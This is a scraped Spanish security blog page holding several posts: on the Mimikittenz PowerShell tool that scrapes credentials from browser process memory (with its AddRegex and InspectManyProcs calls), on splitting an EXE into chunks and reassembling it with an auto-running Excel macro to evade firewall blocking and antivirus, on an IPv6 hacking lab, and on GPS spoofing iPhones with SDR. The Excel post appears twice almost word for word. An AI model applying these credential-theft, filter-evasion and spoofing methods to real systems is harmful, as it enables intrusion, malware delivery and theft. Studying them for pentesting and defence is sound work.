Hace no más de una semana se ha liberado una herramienta llamada Mimikittez, la cual es un script de Powershell para pentesters, que se encarga de leer diferentes procesos, que podemos definir, y lanzar expresiones regulares en busca de leaks con contraseñas y usuarios. El script es potente, ya que podríamos utilizarlo a través de una sesión de Metasploit con el payload de Powershell, y poder aprovecharnos en remoto de esta característica. No hay que olvidar a Netripper que también nos permite, a través de Powershell, hookear procesos e interceptar, antes de que sea cifrado, el contenido de la comunicación.
Mimikittenz es una herramienta de post-explotación dónde se utiliza la función ReadProcessMemory() para extraer las credenciales en texto plano de varios procesos. La herramienta también puede extraer otro tipo de información definida como jugosa de otros procesos. Además, la herramienta no está atada a ser ejecutada con privilegios de administrador, se puede utilizar desde un contexto de usuario, siempre y cuando los procesos sean del usuario en cuestión.
![]() |
| Figura 2: Mimikittenz en GitHub |
Mimikittenz presenta una estructura interesante y extensible gracias a dos funciones: AddRegex e InspectManyProcs. La primera permite que, con un poco de maña, manipulemos el script con el objetivo de añadir expresiones regulares con las que comparar información en el análisis del proceso. Viendo el código encontramos esta función:
[mimikittenz.MemProcInspector]::AddRegex("<NameOfTarget>","<regex_here>")
[mimikittenz.MemProcInspector]::InspectManyProcs("iexplore","chrome","firefox")Es realmente sencillo añadir procesos que deben ser inspeccionados en busca de las expresiones regulares que configuremos.
Echando un ojo a la ejecución de Mimikittenz vemos como se mostraría la información tras una ejecución del script en la máquina. Mimikittenz va abriendo los diferentes procesos indicados anteriormente y leyendo de ellos el contenido en memoria RAM. En ese momento se van pasando las diferentes expresiones regulares en busca de coincidencias. En el caso de encontrar una coincidencia se almacena el valor para ser, posteriormente, mostrado.
| Figura 3: Patrones coincidentes |
Es una herramienta de post-explotación bastante interesante y que automatiza el proceso de mirar dentro de la memoria en busca de leaks de información sensible por parte de las aplicaciones. Para el caso del gestor KeePass se podría realizar una serie de expresiones regulares con la intención de obtener la información sensible de la memoria.
A modo de ejemplo, se añade una nueva expresión regular en el script de Mimikittenz. Como se puede ver es muy sencillo de añadir. La expresión regular funcionaría para el sitio web de El Otro Lado, pero también para otros muchos dónde se encontrara un parámetro denominado password seguido del signo = y con diversos caracteres después. En la siguiente imagen se puede ver cómo queda el código.
| Figura 4: Añadir regexp |
Actualmente, ya comenté que lleva apenas diez días en Github, la herramienta permite extraer credenciales de memoria RAM de diferentes servicios. La herramienta los agrupa por categorías, las cuales enumero a continuación:
Webmail: Encontramos expresiones regulares para extraer credenciales de Gmail, Office 365 u Outlook Web.En el caso de la expresión regular añadida para "El Otro Lado" podemos ver como en la siguiente captura del navegador nos la encontramos. Otra variación sencilla de la herramienta es que permita leer capturas ya realizadas y sacar el máximo provecho al análisis forense de la memoria RAM, por lo que es una posibilidad muy interesante.
Accounting: Xero y MYOB.
Acceso remoto: Tenemos disponibles expresiones regulares para Juniper SSL-VPN, Citrix NetScaler o Remote Desktop Web Access 2012.
Desarrollo y seguimiento: Expresiones regulares para Jira, Github, Bugzilla, Zendesk o Cpanel.
Miscelánea: Aquí nos encontramos con expresiones regulares para Malwr, VirusTotal, AnubisLabs, Dropbox, Microsoft Onedrive, AWS Web Services, Slack, Twitter o Facebook.
| Figura 5: Búsqueda de contraseñas del volcado de memoria. |
El potencial del script es alto, y lo que más me ha gustado es que es muy personalizable y de forma muy sencilla. Herramienta necesaria para nuestra mochila en la fase de post-explotación de sistemas Windows por dónde vayamos accediendo en la auditoria. Veremos a muchos pentesters llevando a Mimikittenz en su mochila alineada con nuestro Meterpreter para sacar el máximo provecho al lateral movement.
Autor: Pablo González Pérez (@pablogonzalezpe)
Escritor de los libros "Metasploit para Pentesters", "Ethical Hacking", "Got Root" y Pentesting con Powershell
Sigue Un informático en el lado del mal - Google+ RSS 0xWord

Available link for download
Friday, October 7, 2016
Cómo infiltrar malware o herramientas de hacking en una empresa usando Excel
Cómo infiltrar malware o herramientas de hacking en una empresa usando Excel
Últimamente, con la proliferación de malware del tipo ransomware, las empresas que no tenían ya bloqueada la descarga de ficheros ejecutables en su Firewall o Proxy, la han bloqueado. La medida es efectiva por la mecánica de infección de este tipo de malware, que en muchos casos implica la descarga de un fichero ejecutable que es el que se encarga de cifrar la valiosa información del usuario y de la empresa. Sin embargo, esta medida no tiene porque ser eficaz frente a un ataque dirigido y hecho a medida como suelen ser los APT, como vamos a ver.
Bloquear la descarga de ejecutables en el firewall de perímetro por el que los usuarios de la empresa navegan en Internet es una medida a tener en cuenta por los responsables de seguridad dentro de la política de Defensa en Profundidad de la red, pero una vez bloqueada esta descarga de ficheros, inevitablemente surgen preguntas. ¿Puede un atacante saltársela fácilmente? ¿Y si se salta, es posible implementar de forma sencilla un ataque automatizado?
HTTPs Inspection: Canal cifrado o canal abierto
Supongo que hay varios enfoques para conseguir saltarse la detección de un fichero EXE por parte del firewall en cuestión. Uno sería, por ejemplo, cifrar el canal de comunicación de las descarga punto a punto para que no se pueda analizar ese tráfico, pero desde hace años los sistemas de navegación empresariales pueden implementar medidas de Bridging HTTPs - como implementa desde hace años Forefront TMG - para inspeccionar el tráfico de descarga que hacen los clientes. Es decir, los clientes para poder navegar por Internet necesitan configurar un certificado raíz del firewall y este hace de man in the middle para inspeccionar tráfico HTTPs.
En esta prueba de concepto, vamos a intentar engañar al firewall para que la descarga de los ejecutables no sea considerada como tal, aún cuando el tráfico pueda ser inspeccionado porque venga por HTTP o porque se esté haciendo una inspección HTTPs.
Infiltrando binarios por partes
Por empezar por algún sitio me voy a centrar en los archivos EXE y como solución perimetral un firewall con inspección de tráfico y bloqueo de ficheros. Lo primero es averiguar qué partes del ficheros son la firma de un EXE para el firewall. Esto puede ser solo la cabecera inicial del binario con los Magic Numbers que se buscan, o algo mucho más elaborado donde se comprueben más partes del binario.
Como primera prueba empírica, vamos a partirlo en dos y ver si una, ninguna o las dos partes son detectadas por el firewall y lo bloquea o lo deja pasar. El resultado que se obtiene es que el primer trozo, al descargarlo, es considerado como un EXE y el segundo no:
Ya tenemos pistas. En el primer trozo del fichero EXE se encuentra la firma que se busca como patrón para detectarlo y bloquear la descarga. ¿Será un patrón? Si lo es, ¿se podría trocear el fichero en partes lo suficientemente pequeñas para que ese patrón quedara diluido? La idea es que si lo troceamos lo suficiente, podríamos llegar a ofuscarle la firma. Después de algunas iteraciones jugando con el tamaño de las partes del archivo, con 29 partes de 200 bytes del principio del EXE y otra parte más con el resto del fichero, llegamos a un escenario como éste.
Una vez subidas al servidor web de turno se intentan descargar y todas bajan. Hemos conseguido descargar un EXE estando prohibido. Ahora solo queda volver a juntar las partes para conseguir reconstruir nuestra "herramienta de hacking" Putty.
Automatizando la infiltración del binario con Excel
Ahora queda la segunda parte, en la que vamos a intentar automatizar el proceso de recomponerlo. Para ello vamos a utilizar la potencia de Excel y sus macros - que ya vimos que un atacante se puede llevar uno la base de datos completa de la empresa con solo habilitar las macros - y que se han puesto de moda últimamente otra vez. Solo hay que programar una macro que descargue las partes del EXE de la web donde estén colgados y que después los junte otra vez. Ese archivo Excel tendría que descargar las partes, después cargar esas partes en orden en un string y después escribir ese string en un archivo binario que nivel de código no es muy difícil. Y usar después la función Auto_Open(), por ejemplo, para que se ejecute todo simplemente abriendo el Excel.
Con solo abrir el Excel - y conseguir que se ejecute la macro - el fichero Excel descarga todas las partes del servidor desde la máquina interna de la red detrás del firewall, las une y después ejecuta el binario resultante.
Protección en el end-point
Ya hemos conseguido que el fichero Excel con macros se baje un binario saltándose el bloqueo de ficheros EXE en el firewall. La siguiente pregunta es si un fichero de estas características será muy llamativo para las protecciones de end-point como los antivirus. Para la mayoría no es significativo, pero además el código se puede mejorar y ofuscar en diferentes iteraciones hasta que se evada el motor antivirus en concreto que tenga la empresa objetivo de este ataque.
Un posible problema es que el usuario si puede, tiene que habilitar las macros para que esto funcione, pero con una campaña de Spear Phishing contra los empleados de la empresa objetivo con este fichero Excel adjunto ¿estaríais completamente seguros de que ningún usuario le va a dar a activar macros? Por supuesto, existen políticas a nivel de Active Directory para que las macros vayan firmadas, pero esto ya vimos hace tiempo que se puede saltar si el usuario de Excel quiere o cae engañado para hacerlo, con las técnicas de "Hacking Remote Apps: Jailbreaking con Excel".
Owning con Metasploit
Ahora imaginad que en vez de el Putty el archivo fuera un script de Phyton compilado a EXE con un cliente que devolviera una shell remota a través de HTTP, o un ransomware distribuido de esta forma o directamente un Meterpreter para hacer diabluras con Metasploit, tal y como hicieron Chema Alonso y Pablo González en la conferencia del Security Innovation Day de 2014. Aquí os dejo el vídeo con el instante de tiempo de esta demo con Excel.
Figura 10: Metiendo una shell con Excel
No quiere decir este artículo que las medidas de bloqueo de ficheros EXE en los firewalls por los que se navega sean inútiles. Ni mucho menos, proporcionan una protección adecuada para evitar que el malware pueda entrar fácilmente. Pero estas medidas deben acompañarse de muchas otras. En este caso concreto hemos hecho una división del binario para evadir las firmas, pero el atacante podría haber cifrado el fichero completamente en lugar de meterlo por partes, o encontrar otra estrategia para saltarse el fichero.
Así que, dentro de la estrategia de defensa de una empresa, habría que aplicar medidas de protección a todos los niveles, y fortificar Windows correctamente, incluidas las opciones de Excel. Este artículo, solo es un ejercicio para probar cómo un APT puede acabar encontrando el camino si tiene tiempo para aprender cuáles son tus defensas y preparar un ataque diseñado especialmente para ti. No te olvides de eso.
Saludos.
Autor: Xavier Nogues García
![]() |
| Figura 1: Cómo infiltrar malware o herramientas de hacking en una empresa con Excel |
Bloquear la descarga de ejecutables en el firewall de perímetro por el que los usuarios de la empresa navegan en Internet es una medida a tener en cuenta por los responsables de seguridad dentro de la política de Defensa en Profundidad de la red, pero una vez bloqueada esta descarga de ficheros, inevitablemente surgen preguntas. ¿Puede un atacante saltársela fácilmente? ¿Y si se salta, es posible implementar de forma sencilla un ataque automatizado?
HTTPs Inspection: Canal cifrado o canal abierto
Supongo que hay varios enfoques para conseguir saltarse la detección de un fichero EXE por parte del firewall en cuestión. Uno sería, por ejemplo, cifrar el canal de comunicación de las descarga punto a punto para que no se pueda analizar ese tráfico, pero desde hace años los sistemas de navegación empresariales pueden implementar medidas de Bridging HTTPs - como implementa desde hace años Forefront TMG - para inspeccionar el tráfico de descarga que hacen los clientes. Es decir, los clientes para poder navegar por Internet necesitan configurar un certificado raíz del firewall y este hace de man in the middle para inspeccionar tráfico HTTPs.
![]() |
| Figura 2: HTTPs Inspection en Forefront TMG |
En esta prueba de concepto, vamos a intentar engañar al firewall para que la descarga de los ejecutables no sea considerada como tal, aún cuando el tráfico pueda ser inspeccionado porque venga por HTTP o porque se esté haciendo una inspección HTTPs.
Infiltrando binarios por partes
Por empezar por algún sitio me voy a centrar en los archivos EXE y como solución perimetral un firewall con inspección de tráfico y bloqueo de ficheros. Lo primero es averiguar qué partes del ficheros son la firma de un EXE para el firewall. Esto puede ser solo la cabecera inicial del binario con los Magic Numbers que se buscan, o algo mucho más elaborado donde se comprueben más partes del binario.
![]() |
| Figura 3: Primera parte del fichero EXE es detectada |
Como primera prueba empírica, vamos a partirlo en dos y ver si una, ninguna o las dos partes son detectadas por el firewall y lo bloquea o lo deja pasar. El resultado que se obtiene es que el primer trozo, al descargarlo, es considerado como un EXE y el segundo no:
![]() |
| Figura 4: La segunda parte del fichero sí es descargada |
Ya tenemos pistas. En el primer trozo del fichero EXE se encuentra la firma que se busca como patrón para detectarlo y bloquear la descarga. ¿Será un patrón? Si lo es, ¿se podría trocear el fichero en partes lo suficientemente pequeñas para que ese patrón quedara diluido? La idea es que si lo troceamos lo suficiente, podríamos llegar a ofuscarle la firma. Después de algunas iteraciones jugando con el tamaño de las partes del archivo, con 29 partes de 200 bytes del principio del EXE y otra parte más con el resto del fichero, llegamos a un escenario como éste.
![]() |
| Figura 5: Fichero dividido en 30 partes |
Una vez subidas al servidor web de turno se intentan descargar y todas bajan. Hemos conseguido descargar un EXE estando prohibido. Ahora solo queda volver a juntar las partes para conseguir reconstruir nuestra "herramienta de hacking" Putty.
![]() |
| Figura 6: Putty se ejecuta correctamente una vez reconstruido el binario |
Automatizando la infiltración del binario con Excel
Ahora queda la segunda parte, en la que vamos a intentar automatizar el proceso de recomponerlo. Para ello vamos a utilizar la potencia de Excel y sus macros - que ya vimos que un atacante se puede llevar uno la base de datos completa de la empresa con solo habilitar las macros - y que se han puesto de moda últimamente otra vez. Solo hay que programar una macro que descargue las partes del EXE de la web donde estén colgados y que después los junte otra vez. Ese archivo Excel tendría que descargar las partes, después cargar esas partes en orden en un string y después escribir ese string en un archivo binario que nivel de código no es muy difícil. Y usar después la función Auto_Open(), por ejemplo, para que se ejecute todo simplemente abriendo el Excel.
![]() |
| Figura 7: A partir del Excel se descargan las partes y se monta el archivo final |
Con solo abrir el Excel - y conseguir que se ejecute la macro - el fichero Excel descarga todas las partes del servidor desde la máquina interna de la red detrás del firewall, las une y después ejecuta el binario resultante.
![]() |
| Figura 8: Ejecución de Putty con solo ejecutar la macro del fichero Excel |
Protección en el end-point
Ya hemos conseguido que el fichero Excel con macros se baje un binario saltándose el bloqueo de ficheros EXE en el firewall. La siguiente pregunta es si un fichero de estas características será muy llamativo para las protecciones de end-point como los antivirus. Para la mayoría no es significativo, pero además el código se puede mejorar y ofuscar en diferentes iteraciones hasta que se evada el motor antivirus en concreto que tenga la empresa objetivo de este ataque.
![]() |
| Figura 9: El fichero Excel no llama la atención de muchos Antivirus |
Un posible problema es que el usuario si puede, tiene que habilitar las macros para que esto funcione, pero con una campaña de Spear Phishing contra los empleados de la empresa objetivo con este fichero Excel adjunto ¿estaríais completamente seguros de que ningún usuario le va a dar a activar macros? Por supuesto, existen políticas a nivel de Active Directory para que las macros vayan firmadas, pero esto ya vimos hace tiempo que se puede saltar si el usuario de Excel quiere o cae engañado para hacerlo, con las técnicas de "Hacking Remote Apps: Jailbreaking con Excel".
Owning con Metasploit
Ahora imaginad que en vez de el Putty el archivo fuera un script de Phyton compilado a EXE con un cliente que devolviera una shell remota a través de HTTP, o un ransomware distribuido de esta forma o directamente un Meterpreter para hacer diabluras con Metasploit, tal y como hicieron Chema Alonso y Pablo González en la conferencia del Security Innovation Day de 2014. Aquí os dejo el vídeo con el instante de tiempo de esta demo con Excel.
Figura 10: Metiendo una shell con Excel
No quiere decir este artículo que las medidas de bloqueo de ficheros EXE en los firewalls por los que se navega sean inútiles. Ni mucho menos, proporcionan una protección adecuada para evitar que el malware pueda entrar fácilmente. Pero estas medidas deben acompañarse de muchas otras. En este caso concreto hemos hecho una división del binario para evadir las firmas, pero el atacante podría haber cifrado el fichero completamente en lugar de meterlo por partes, o encontrar otra estrategia para saltarse el fichero.
Así que, dentro de la estrategia de defensa de una empresa, habría que aplicar medidas de protección a todos los niveles, y fortificar Windows correctamente, incluidas las opciones de Excel. Este artículo, solo es un ejercicio para probar cómo un APT puede acabar encontrando el camino si tiene tiempo para aprender cuáles son tus defensas y preparar un ataque diseñado especialmente para ti. No te olvides de eso.
Saludos.
Autor: Xavier Nogues García
Sigue Un informático en el lado del mal - Google+ RSS 0xWord

Available link for download
Sunday, August 28, 2016
Montar un escenario de Hacking IPv6 por 2 €
Montar un escenario de Hacking IPv6 por 2 €
Ya se han comenzado a publicar en vídeo las charlas que componen el XII Ciclo de Conferencias TASSI, que podéis ver en la web de CriptoRed. Entre las charlas, nuestro compañero de Eleven Paths Rafael Sánchez (@r_a_ff_a_e_ll_o) participó con una sobre cómo se podía montar un escenario de hacking IPv6 montando un VPS con los túneles IPv4/IPv6 adecuados.
![]() |
| Figura 1: Montar un escenario de hacking IPv6 por 2 |
La sesión explica los fundamentos básicos del protocolo IPv6, y da consejos para empezar a trabajar en Internet con IPv6, algo que usarían después para la charla que impartieron en RootedCON sobre cómo escanear IPv6 en Internet usando diversas técnicas. Aquí tenéis el vídeo de la sesión.
Figura 2: Conferencia de Rafael Sánchez sobre cómo montar un escenario de hacking IPv6 por 2
Las diapositivas están disponibles en formato PDF y las vamos a subir al Canal SlideShare de Eleven Paths, y si quieres más referencias sobre ataques en redes IPv6, te dejo los enlaces de los artículos que he publicado ya por aquí sobre esta temática.
- Hacking en redes de datos IPv6: Conceptos básicos IPv6 (1)
- Hacking en redes de datos IPv6: Conceptos básicos IPv6 (2)
- Hacking en redes de datos IPv6: Hackeado en IPv6 por creer que no lo usas
- Hacking en redes de datos IPv6: Ataque de Neighbor Spoofing
- Hacking en redes de datos IPv6: Captura de SMB con Neighbor Spoofing
- Hacking en redes de datos IPv6: FC00::1 (Algunos) Ataques en redes IPv6
- Hacking en redes de datos IPv6: Man in the middle en redes IPv4 usando IPv6
- Hacking en redes de datos IPv6: Desactivar IPv6 para evitar D.O.S. SLAAC
- Hacking en redes de datos IPv6: Predecir direcciones IPv6 Local-Link de OS X
- Hacking en redes de datos IPv6: Ataques en redes de datos IPv4 e IPv6
- Hacking en redes de datos IPv6: Evil FOCA: Ataque SLAAC
- Hacking en redes de datos IPv6: Evil FOCA: Bridging HTTP(IPv6)-HTTPs(IPv4)
- Hacking en redes de datos IPv6: Pasar de IPv4 a IPv6 con una respuesta DNS
- Hacking en redes de datos IPv6: Cómo activar IPv6 en Google Chrome
- Hacking en redes de datos IPv4: Ataque DHCP ACK Injector
- Evil FOCA liberada bajo licencia Open Source
- Hacking en redes de datos IPv6: Topera - Scanner de puertos sobre IPv6
- Implementación de Iddle Port Scanning con IPv6
- Detección de IPv6 en Internet: Cada vez hay más sitios
- Detección de Happy Eyeballs en la red
- Ataque ICMPv6 Redirect: man in the middle a Android, OS X & iPhone
- Implementación de ataques "Delorean" a HSTS
Saludos Malignos!
Sigue Un informático en el lado del mal - Google+ RSS 0xWord

Available link for download
Friday, August 19, 2016
Cómo hacer que el iPhone de tu enemigo viaje en el tiempo y en el espacio GPS iPhone Hacking SDR
Cómo hacer que el iPhone de tu enemigo viaje en el tiempo y en el espacio GPS iPhone Hacking SDR
La historia que os voy a contar es un ejemplo de cómo los detalles de seguridad en las tecnologías pueden acabar por tumbar muchas de las conclusiones que damos por ciertas usándolas. En el caso de hoy, voy a hablaros otra vez de algo que muchos ya saben que es inseguro, pero que sin embargo es parte fundamental de nuestras vidas hoy en día, las señales GPS que reciben nuestros dispositivos. De hoy va la historia en la que ha estado trabajando el investigador español JAEP Erratum y que os voy a explicar.
![]() |
| Figura 1: Cómo hacer que el iPhone de tu enemigo viaje en el tiempo {y en el espacio} con GPS Spoofing |
Las señales GPS las utilizamos en todos los servicios de navegación que llevan nuestros dispositivos, desde los servicios como Waze, Google Maps, Apple Maps o TomTom, hasta los detectores de radares de velocidad que se venden y van en cualquier lugar del coche para avisar al conductor de un posible control oculto en la carretera. Pero no solo eso, se utilizan en servicios de las redes sociales, en publicidad dirigida, en el mundo de los juegos, etc...
Ataques SDR-RTL
Esta señal GPS, como hemos visto muchas veces, se puede falsificar fácilmente en el terminal por el dueño del mismo, por lo que algunos servicios podrían ser abusados. Este fue el ejemplo del caso de Tinder, lo que permite a una persona localizar a otra en cualquier lugar del mundo, ligar con todo un país o perseguir a una víctima con una especie de drone de vigilancia. También, manipulando la señal en el terminal podría afectar a la validez legal de los de certificación digital de fotografías tomadas en una ubicación, como en el caso de Stamphoto, pero esto, como vamos a ver, también se puede hacer remotamente con un ataque de SDR-RTL.
Figura 2: Configurar ataque SDR-RTL para localizar satélites
Las tecnologías de SDR (Software Defined Radio) permiten a un atacante emitir y escuchar señales en frecuencias del espectro utilizadas por diferentes tecnologías que dan soporte a comunicaciones de toda índole y son una pieza clave en el Hacking de Comunicaciones Móviles. Como ya vimos, un ejemplo sencillo es utilizar un sistema SDR-RTL para poder escuchar las conversaciones GSM y hasta poder capturar los mensajes SMS que se envían por la red. Esto, podría ser utilizado para robar cuentas de de servicios de Internet protegidas por mensajes SMS si el atacante está cerca de la antena por la que la víctima va a recibir la comunicación.
Ataques GPS Spoofing con SDR
Ataques GPS Spoofing con SDR
También se pueden atacar otro tipo de señales, como las del mundo IoT - de las que podremos hablar largo y tendido en otros artículos, pero hoy, como os podéis imaginar por el cariz que lleva la historia, las señales de las que hay que hablar son las de GPS, que no están cifradas ni protegidas. Esto permite que cualquier atacante que esté cerca tuya pueda inyectarte una señal falsa GPS en el terminal, mandando tu dispositivo GPS a cualquier ubicación del mundo y, lo que es peor, a cualquier fecha.
![]() |
| Figura 3: Ataques de GPS Spoofing con Open Source Projects |
Esto es porque la señal GPS también se utiliza en muchos terminales para configurar la fecha y la hora - como por ejemplo los dispositivos iOS -. En esta conferencia impartida en DefCON 23 podéis ver todos los ataques SDR contra GPS que se pueden realizar. 36 minutos de learn&fun.
Figura 4: Ataques GPS Spoofing
Manipular la fecha y la hora vía GPS de un terminal iPhone puede hacer que todas las apps que tenga un sistema empiecen a fallar, dejen de funcionar, o comprometan a una persona a la que un atacante puede situar en un lugar y una fecha concreta ante los ojos de un analista forense que tire de herramientas para analizar los datos de un terminal.
Ataques GPS Spoofing con SDR a iPhone
En este vídeo hecho por JAEP Erratum se puede ver cómo remotamente, un atacante puede enviar señales falsas GPS a una víctima con su iPhone - utilizando la herramienta sdr-gps-sim y tenerla paseando por Barcelona, París o cualquier lugar del mundo.
Ataques GPS Spoofing con SDR a iPhone
En este vídeo hecho por JAEP Erratum se puede ver cómo remotamente, un atacante puede enviar señales falsas GPS a una víctima con su iPhone - utilizando la herramienta sdr-gps-sim y tenerla paseando por Barcelona, París o cualquier lugar del mundo.
Figura 5: Demo de ataque GPS Spoofing a iPhone con SDR
Por supuesto, este ataque afectaría a cualquier servicio de certificación de ubicaciones GPS, o a los sistemas sociales - podrías tener a tu amigo adicto Tinder toda una noche buscando pareja con chicas del otro lado del mundo -, o en el caso de iOS 5 la señal GPS también se podía cambiar desde las señales 2G/Edge/GPRS, y esto producía un efecto muy curioso en iPad e iPhone, ya que se engañaba al sistema y te permitía acceder a las fotografías sin desbloquear la pantalla del terminal.
¿Te imaginas que alguien desde un puente de una autopista justo antes de una salida se pusiera a enviar señales GPS que situaran a los coches desplazados 300 metros? Podríamos estar hablando de la generación de un problema serio, ya que todos los conductores podrían sufrir una distracción de alto peligro. Pero es que se puede hacer que el terminal iPhone deje de funcionar con todas su apps. Por ejemplo, en este otro vídeo de JAEP Erratum se puede ver cómo enviar a cualquier iPhone al futuro. En concreto, al 16 de Agosto del año 2029, justo al lado del Santiago Bernabéu en la bella ciudad de Madrid - supongo que para ver algún partido del Real Madrid -.
Figura 6: Demo (D.o.S.) de cambio de fecha y ubicación GPS a iPhone
Dicho esto, ya hay muchas iniciativas para cambiar los sistemas GPS por sistemas más robustos en los que los terminales clientes validen a los emisores de la señal GPS, y hay medidas de contención para detectar señales falsas en los sistemas operativos de los smartphones, pero la realidad es que como se puede ver, a día de hoy las cosas están como están.
Saludos Malignos!
Sigue Un informático en el lado del mal - Google+ RSS 0xWord

Available link for download
Subscribe to:
Posts (Atom)































